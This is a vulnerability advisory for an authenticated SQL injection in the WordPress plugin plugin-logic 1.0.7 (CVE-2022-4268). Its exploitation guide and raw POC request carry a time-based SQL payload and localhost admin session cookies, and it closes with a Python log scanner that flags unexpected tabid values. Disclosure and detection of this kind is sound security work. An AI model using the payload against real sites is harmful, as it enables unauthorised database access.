plugin-logic 1.0.7 WordPress plug-in SQL injection

Vulnerability Metadata

| Key | Value |
| --- | --- |
| Date of Disclosure | December 02 2022 |
| Affected Software | plugin-logic |
| Affected Software Type | WordPress plugin |
| Version | 1.0.7 |
| Weakness | SQL Injection |
| CVE ID | CVE-2022-4268 |
| CVSS 3.x Base Score | n/a |
| CVSS 2.0 Base Score | n/a |
| Reporter | Kunal Sharma, Daniel Krohmer |
| Reporter Contact | |
| Link to Affected Software | |
| Link to Vulnerability DB | |

Vulnerability Description

The tabid GET query parameter in plugin-logic 1.0.7 is vulnerable to SQL injection. An authenticated attacker may abuse the fetch-active-plugins functionality in the plulo_option_page function inside plugin-logic.php. In a multisite setup, a threat actor can trigger the injection by crafting a malicious GET request.

Exploitation Guide

Log in as an admin user. This attack requires at least admin privileges. Note: The plugin should be installed in a multisite network.

Go to Plugin Logic under the Plugins option on the WordPress site dashboard.

Click Save Changes on any tab.

Clicking this button triggers the vulnerable request. We have to add an additional GET query parameter, tabid, to the request.

A POC may look like the following request:

In the code, the vulnerability is triggered by unsanitized user input of tabid at line 203 in ./plugin-logic.php.

At lines 213-216 in ./plugin-logic.php, the database query call on $selected_blog leads to SQL injection.


Exploit Payload

Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.

The SQL injection can be triggered by sending the request below:

POST /wp-admin/network/plugins.php?page=plugin-logic&tabid=options%2bunion%2bSELECT%2bSLEEP(6)%3b%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/network/plugins.php?page=plugin-logic
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
Origin: http://localhost
Connection: close
Cookie: wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1666185599; wp-settings-8=libraryContent%3Dbrowse; wp-settings-time-8=1666389039; wordpress_test_cookie=WP%20Cookie%20check; wordpress_c9db569cb388e160e4b86ca1ddff84d7=newadmin%7C1666566701%7COfIsPG6DZPN1yTZcYsQ9O8Co7ADOvG6nne9kO5iGtqs%7C0abf94c1e22528cf048ff22b03d79223ba73c502056deb9a9ce748fa0c03b2c0; wordpress_logged_in_c9db569cb388e160e4b86ca1ddff84d7=newadmin%7C1666566701%7COfIsPG6DZPN1yTZcYsQ9O8Co7ADOvG6nne9kO5iGtqs%7C9bf5c239139b198a8856c9927f2cf4835b8583556b6e07b6270ec1284a59f953
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
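
For detection, requests of the shape shown above can be found in web server access logs by checking the decoded tabid value against an allowlist. The following is an added example, not part of the original advisory or the plugin's code; the log lines are constructed, and the allowlist (short identifier-like tokens) is an assumption about what legitimate tabid values look like.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate tabid values are short identifier-like tokens.
SAFE_TABID = re.compile(r"[A-Za-z0-9_-]{1,32}")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
ADMIN_PAGE = "/wp-admin/network/plugins.php"

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [20/Oct/2022:10:01:02 +0000] "GET /wp-admin/network/plugins.php?page=plugin-logic HTTP/1.1" 200 5120
203.0.113.7 - - [20/Oct/2022:10:01:09 +0000] "POST /wp-admin/network/plugins.php?page=plugin-logic&tabid=2 HTTP/1.1" 200 5200
198.51.100.9 - - [20/Oct/2022:10:02:41 +0000] "POST /wp-admin/network/plugins.php?page=plugin-logic&tabid=options%2bunion%2bSELECT%2bSLEEP(6)%3b%23 HTTP/1.1" 200 5200
198.51.100.9 - - [20/Oct/2022:10:03:00 +0000] "GET /wp-admin/plugins.php?page=other&tabid=a%27b HTTP/1.1" 200 900
"""


def suspicious_tabid_requests(log_text):
    """Return (line_number, decoded_tabid) for plugin-logic requests whose
    tabid falls outside the allowlist."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        # Only the network admin page named in the advisory is in scope.
        if not url.path.endswith(ADMIN_PAGE):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        if "plugin-logic" not in params.get("page", []):
            continue
        # parse_qs percent-decodes values, so encoded SQL syntax is visible here.
        for value in params.get("tabid", []):
            if not SAFE_TABID.fullmatch(value):
                findings.append((number, value))
    return findings


if __name__ == "__main__":
    for number, value in suspicious_tabid_requests(SAMPLE_LOG):
        print(f"line {number}: unexpected tabid {value!r}")
```

The same allowlist check, applied server-side to tabid before it reaches the database call, is the input validation the vulnerable code path lacks.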